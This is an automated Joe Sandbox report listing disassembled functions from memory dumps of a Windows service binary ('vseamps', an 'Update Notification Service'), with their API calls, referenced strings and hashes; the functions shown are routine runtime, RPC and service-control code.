Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFDA580712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071B1
GetLastError.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071E9
FreeLibrary.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA5807257
GetProcAddress.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA5807263

Strings

api-ms-, xrefs: 00007FFDA58071D1

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: cbd2ee8333d022ba9ca69cfc978033c7dc408b5fdfb00161c87cbd75f9d2c686
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 7531D221B1B64A91FE169B22A4207B92394BF4AF61F590774ED1F87392EF3CE4418308

Function 00007FFDA5809444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDA5809453
FlsGetValue.KERNEL32 ref: 00007FFDA5809468
FlsSetValue.KERNEL32 ref: 00007FFDA5809489
FlsSetValue.KERNEL32 ref: 00007FFDA58094B6
FlsSetValue.KERNEL32 ref: 00007FFDA58094C7
FlsSetValue.KERNEL32 ref: 00007FFDA58094D8
SetLastError.KERNEL32 ref: 00007FFDA58094F3

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: c1478fb23d69b8489b4d3f6950874c6254d5f5f99169266818a394e59ed500db
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: DA215E60B0FA9A46FA94B331557133D5242AF46FB0F1407B4E93E07BDBEE2CA8418708

Function 00007FFDA5810100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFDA5810131
GetLastError.KERNEL32 ref: 00007FFDA581013D
CloseHandle.KERNEL32 ref: 00007FFDA5810155
CreateFileW.KERNEL32 ref: 00007FFDA5810180
WriteConsoleW.KERNEL32 ref: 00007FFDA581019F

Strings

CONOUT$, xrefs: 00007FFDA5810161

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 6ed119960da3c14ab0f8d033e0277459b014c5dbed9ec3107c1c85845cb49465
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: F6118E21B19A45C2E7508B72E86432973A0FB8AFE4F044274EA5F87BD5CF3CD5448748

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Jul 5 2019, xrefs: 0000000140001216
Help, xrefs: 0000000140001238
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
10:52:57, xrefs: 000000014000120F

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFDA5804CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDA5804E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDA580519B

Strings

csm, xrefs: 00007FFDA5804DB9
csm, xrefs: 00007FFDA5804E1B
csm, xrefs: 00007FFDA5804E99

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: c406caa237195cd02fdade61d8adba87a26ef70a72da8dde0e696cf92646bfeb
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: 39E19D72A0978A8AE7209B34D4A03BD37A0EF56B48F144275DE8D577A6DE38E582C704

Function 00007FFDA58095BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA58095CB
FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA5809601
FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580962E
FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580963F
FlsSetValue.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA5809650
SetLastError.KERNEL32(?,?,?,00007FFDA5808BC9,?,?,?,?,00007FFDA5808C14), ref: 00007FFDA580966B

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 6defa91378cbb318d49f55524743880815f009afa88f8b938dfd1aecdfce6ed8
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: E1113B60B0F68A46FA54B33155713396252AF4AFB0F4447B5E83E077DBDE2CE8418708

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFDA5807F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFDA5807F4D
GetProcAddress.KERNEL32 ref: 00007FFDA5807F63
FreeLibrary.KERNEL32 ref: 00007FFDA5807F8A

Strings

CorExitProcess, xrefs: 00007FFDA5807F5C
mscoree.dll, xrefs: 00007FFDA5807F44

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: 3362112d1b1b1ed8b731dcb36f440aaf36fd999ac62bda9c610862d6e1523bb3
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 0EF06265B1A60A81FB108B35E4647796320BF86F62F540375DA6F867E5CF2CD049C344

